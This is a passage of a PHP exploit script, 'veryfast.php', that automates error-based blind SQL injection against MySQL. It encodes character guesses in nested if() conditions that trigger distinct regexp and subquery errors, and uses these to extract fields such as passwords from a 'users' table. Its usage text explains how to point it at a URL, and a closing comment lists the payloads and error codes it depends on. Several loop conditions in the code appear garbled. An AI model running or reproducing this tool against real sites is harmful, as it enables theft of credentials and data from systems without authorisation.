"Subquery returns more than 1 row", "if(%cond%,%then%,'}x{1,0}')" => "invalid repetition count(s)", "if(%cond%,%then%,'}x{1,(')" => "braces not balanced", "if(%cond%,%then%,'}[[:]]')" => "invalid character class", "if(%cond%,%then%,'}[[')" => "brackets ([ ]) not balanced", "if(%cond%,%then%,'}(({1}')" => "repetition-operator operand invalid", "if(%cond%,%then%,'}|')" => "empty (sub)expression", "if(%cond%,%then%,'}(')" => "parentheses not balanced", "if(%cond%,%then%,'}[2-1]')" => "invalid character range", "if(%cond%,%then%,'}[[.ch.]]')" => "invalid collating element", "if(%cond%,%then%,'}\\\\')" => "trailing backslash", ); $normal = "'}'"; $timeout = 30; // timeout /* ** ** Main code ** */ set_time_limit(0); ignore_user_abort(1); Error_Reporting(E_ALL & ~E_NOTICE); $cnt = 0; function send_xpl($url, $xpl){ global $cnt; $cnt++; return content($url.$xpl); } function content($url) //thx Elekt { global $timeout; $h=@parse_url($url); //echo $url."\r\n"; if(extension_loaded('curl')) { $ch = @curl_init(); @curl_setopt($ch, CURLOPT_ENCODING, ''); #@curl_setopt($ch, CURLOPT_USERAGENT, "Internet Explorer 5.0"); #@curl_setopt($ch, CURLOPT_REFERER, $url); @curl_setopt($ch, CURLOPT_HEADER, 0); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); @curl_setopt($ch, CURLOPT_MAXREDIRS, 2); @curl_setopt($ch, CURLOPT_URL, $url); $page = @curl_exec($ch); @curl_close($ch); return $page; } elseif(extension_loaded('sockets')) { if(@strtolower(@$h['scheme'])=='https') { if(!@extension_loaded('openssl')) return; $h['port']=443; $fp = @fsockopen('ssl://'.@$h['host'], @$h['port'], $errno, $errstr, $timeout);if(!$fp) return; } else { $h['port']=80; $fp = @fsockopen(@$h['host'], @$h['port'], $errno, $errstr, $timeout);if(!$fp) return; } $str="GET ".@$h['path'].'?'.@$h['query']." HTTP/1.0\r\n". "Host: ".@$h['host']."\r\n". "\r\n"; @fputs($fp, $str); $page=''; while (!@feof($fp)) {$page.=@fgets($fp,128);} @fclose ($fp); return $page; } elseif( in_array(@ini_get('allow_url_fopen'),array('On','ON','1','Y','Yes','YES')) && (@$h['scheme']=='https'?@extension_loaded('openssl'):1) ) { @ini_alter('default_socket_timeout',$timeout); return @file_get_contents($url); } else return; } function gen1st($alphabet) { global $queries; $sets = array(); for($i=0;$i<(count($queries)+1);$i++) { // count($queries) - count of queries with errors & one for normal result if($i>=count($alphabet)) break; $sets[$i] = $alphabet[$i]; } $offset = count($sets); $flag = 1; while($offset$rows) { $j++; $row = 1; } if($j>$columns) $j = 0; $sets[$j] = $sets[$j].",".$alphabet[$i]; $row++; } return $sets; } function generateQuery($sets, $number, $id) { global $queries, $condition, $normal; reset($queries); $count = count($sets)-1; $symbols = ""; $then = $normal; for($i=0;$i<$count;$i++) { $key = key($queries); $value = current($queries); if($symbols!="") $symbols = $symbols.","; $symbols = $symbols.$sets[$i]; $cond = str_replace("%symbols%","'".$symbols."'",$condition); $cond = str_replace("%id%",$id,$cond); $cond = str_replace("%number%",$number,$cond); $query = str_replace("%then%","(".$then.")",$key); $query = str_replace("%cond%",$cond,$query); $then = $query; next($queries); } return $query; } function getGroupNum($res) { global $queries; $group = 0; reset($queries); for($i=0;$i1) { $query = $template; $i++; $sets = array(); $sets = gen1st($arr); $q = generateQuery($sets,$num,$id); $query = str_replace("%query%",$q,$query); $res = send_xpl($url, $query); $grNum = getGroupNum($res); $group = $sets[$grNum]; $arr = split(",",$group); } return $group; } if($argc<4) { echo "===================\r\n"; echo "Usage: veryfast.php url field table [target_id] [send_queries] [alphabet]\r\n\r\n url - url of resource with query (see ex.)\r\n field - field name\r\n table - table name\r\n target_id - id of row in table (default=0)\r\n send_queries - count of symbols to get (default=32)\r\n Alphabet - symbols to use in queries, divided by commas (default=[a-f0-9])\r\n\r\n\r\nEx.:\r\n veryfast.php http://test1.ru:8012/sql.php?id=1 password users\r\n - will get first 32 symbols form field 'password' from the first row of table 'users', where symbols can be only [a-f0-9]\r\n\r\n veryfast.php http://test1.ru:8012/sql.php?id=1 login users 5 15 0,1,2,3,4,5,6,7,8,9\r\n - will get first 15 symbols form field 'login' from the 5th row of table 'users', where symbols can be only [0-9],\r\n\r\n"; echo "===================\r\n"; die(); } $url=$argv[1]; $str = ""; echo "Result: "; for($i=1;$i<=$total;$i++) { $symbol = getSymbol($i); $str.= $symbol; echo $symbol; } echo "\r\nTotal: ".$cnt." queries"; /* select * from users where id=-1 AND "x" regexp concat("x{1,25", if(find_in_set(substring((select passwd from users where id=1),1,1),'a,b,c,d,e,f,1,2,3,4,5,6')>0, if(find_in_set(substring((select passwd from users where id=1),1,1),'e,f,1,2,3,4,5,6')>0, if(find_in_set(substring((select passwd from users where id=1),1,1),'3,4,5,6')>0, "(5)", "6}" ), "5}" ), (SELECT 1 UNION SELECT 2) )) 1 gr = Ok 2 gr = #1139 - Got error 'invalid repetition count(s)' from regexp 3 gr = #1139 - Got error 'braces not balanced' from regexp 4 gr = #1242 - Subquery returns more than 1 row --------------- // Can't catch this bugs :( 00034 {REG_NOMATCH, "REG_NOMATCH", "regexec() failed to match"}, 00035 {REG_BADPAT, "REG_BADPAT", "invalid regular expression"}, 00039 {REG_ESUBREG, "REG_ESUBREG", "invalid backreference number"}, 00045 {REG_ESPACE, "REG_ESPACE", "out of memory"}, 00048 {REG_ASSERT, "REG_ASSERT", "\"can't happen\" -- you found a bug"}, 00049 {REG_INVARG, "REG_INVARG", "invalid argument to regex routine"}, 00050 {0, "", "*** unknown regexp error code ***"}, http://dev.mysql.com/sources/doxygen/mysql-5.1/regerror_8c-source.html SELECT 1 No error select if(1=1,(select 1 union select 2),2) #1242 - Subquery returns more than 1 row select 1 regexp if(1=1,"x{1,0}",2) #1139 - Got error 'invalid repetition count(s)' from regexp select 1 regexp if(1=1,"x{1,(",2) #1139 - Got error 'braces not balanced' from regexp select 1 regexp if(1=1,'[[:]]',2) #1139 - Got error 'invalid character class' from regexp select 1 regexp if(1=1,'[[',2) #1139 - Got error 'brackets ([ ]) not balanced' from regexp select 1 regexp if(1=1,'(({1}',2) #1139 - Got error 'repetition-operator operand invalid' from regexp select 1 regexp if(1=1,'',2) #1139 - Got error 'empty (sub)expression' from regexp select 1 regexp if(1=1,'(',2) #1139 - Got error 'parentheses not balanced' from regexp select 1 regexp if(1=1,'[2-1]',2) #1139 - Got error 'invalid character range' from regexp select 1 regexp if(1=1,'[[.ch.]]',2) #1139 - Got error 'invalid collating element' from regexp select 1 regexp if(1=1,'\\',2) #1139 - Got error 'trailing backslash (\)' from regexp */ ?>